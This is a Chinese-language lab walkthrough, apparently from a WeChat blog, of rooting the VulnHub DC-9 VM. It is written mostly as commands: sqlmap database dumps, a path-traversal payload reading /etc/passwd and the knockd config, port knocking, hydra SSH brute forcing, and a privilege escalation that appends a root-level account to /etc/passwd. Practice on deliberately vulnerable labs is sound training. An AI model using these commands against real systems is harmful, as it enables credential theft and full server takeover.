本周末实践的是vulnhub的DC9镜像,这个稍有难度,参考了一些别人的writeup,
下载地址,https://download.vulnhub.com/dc/DC-9.zip,
用workstation导入成功,且能直接扫描出地址,
sudo netdiscover -r 192.168.137.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.132,
注意ssh的状态是filtered,这个根据经验大概率是开了端口敲门,
先访问http看看,看到search页面有个输入框,试试有没有SQL注入漏洞,
直接在界面上框里输入是测不出来的,改用Burp Suite测就出来了,
效果是这样的,
这就可以上sqlmap了,需要把Burp Suite抓到的post请求保存下来给sqlmap用,
先看看都有哪些数据库,sudo sqlmap -r post.txt --dbs,
主要是users和Staff,
对Staff进行脱库,sudo sqlmap -r post.txt -D Staff --dump-all,
密码是md5的,找个在线的解一下,
这就得到了admin/transorbital1,登录http,
提示文件不存在,可猜测存在文件包含漏洞,测一下还真有,
http://192.168.137.132/welcome.php?file=../../../../../../../etc/passwd,
到这里走不下去了,再回到sqlmap,脱另一个数据库users,
sudo sqlmap -r post.txt -D users --dump-all,
这么些用户名密码是可以用来做ssh爆破的,用户名保存到user.txt,密码保存到passwd.txt,
但是有个问题,ssh的状态是filtered,猜测是开了端口敲门的,先要把门打开,这就用到了上面测试出来的文件包含漏洞了,读取到端口敲门的配置,
http://192.168.137.132/welcome.php?file=../../../../../../../etc/knockd.conf,
kali攻击机上安装knockd,sudo apt install knockd,
把门敲开,sudo knock 192.168.137.132 7469 8475 9842,
这就可以爆破ssh了,sudo hydra -L user.txt -P passwd.txt 192.168.137.132 ssh,
这里爆破出来三组可登录的账号密码,经过尝试,janitor/Ilovepeepee有用,能从登录目录下找到另一个密码文件,
把新找到的密码加入passwd.txt,继续爆破,
这次新爆破出来一组可登录的账号密码,fredf/B4-Tru3-001,
登录查看发现/opt/devstuff/dist/test/test可root权限运行,
而且发现/opt/devstuff/dist/test/test能够给文件添加内容,
这就可以走添加新账户的路子了,
sudo openssl passwd -1 -salt hacker password,
echo 'hacker:$1$hacker$9MeWOdvz78rHYG01HSLfr/:0:0::/root:/bin/bash' >> /tmp/passwd,
sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd,
切换到新添加的账户,su hacker,是root,没问题,
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之DC9的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论